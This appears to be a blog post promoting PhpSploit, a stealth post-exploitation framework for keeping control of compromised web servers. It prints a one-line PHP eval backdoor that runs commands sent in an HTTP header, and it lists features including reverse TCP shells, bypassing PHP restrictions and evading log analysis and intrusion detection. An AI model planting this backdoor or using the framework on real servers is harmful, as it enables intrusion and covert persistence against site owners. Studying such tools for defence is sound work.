Posts

Showing posts with the label Stealth Post Exploitation Framework: PhpSploit

Stealth Post Exploitation Framework: PhpSploit

Image
Stealth Post Exploitation Framework      PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes. Stealth Post Exploitation Framework: PhpSploit Overview The obfuscated communication is accomplished using HTTP headers under standard client requests and web server’s relative responses, tunneled through a tiny polymorphic backdoor: <? @eval($_SERVER['HTTP_PHPSPL01T']) ?> Features Efficient: More than 20 plugins to automate post-exploitation tasks Run commands and browse filesystem, bypassing PHP security restrictions Upload/Download files between client and target Edit remote files through local text editor Run SQL console on target system Spawn reverse TCP shells Stealth: The framework is made by paranoids, for paranoids Nearly invisible by log analysis and NIDS ...